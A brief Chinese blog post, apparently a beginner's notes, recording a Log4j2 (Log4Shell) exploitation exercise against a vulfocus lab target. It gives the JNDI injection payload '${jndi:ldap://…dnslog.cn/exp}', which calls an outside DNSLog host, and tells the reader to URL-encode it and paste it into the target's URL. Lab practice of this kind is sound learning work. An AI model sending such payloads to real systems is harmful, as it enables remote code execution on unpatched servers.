关于1种log4j2漏洞利用

菜鸟记录文章大佬勿喷!!!!

首先在vulfocus在线靶机里找到有关于log4j2漏洞利用的

打开对应靶机

跳转至

 

然后打开 DNSLog Platform 拿到一个链接

然后搜索关于log4j2的漏洞利用参考资料作者:程序那点事

Apache log4j2 远程代码执行漏洞复现

 

 然后修改相关语句:${jndi:ldap://wdhcrj.dnslog.cn/exp}   

URL这把替换成DNSlog里的URL

${jndi:ldap://0oim24.dnslog.cn/exp} 

然后进行url转换转换结果然后再 复制到靶机的URL上

 

 


版权声明:本文为weixin_56061250原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。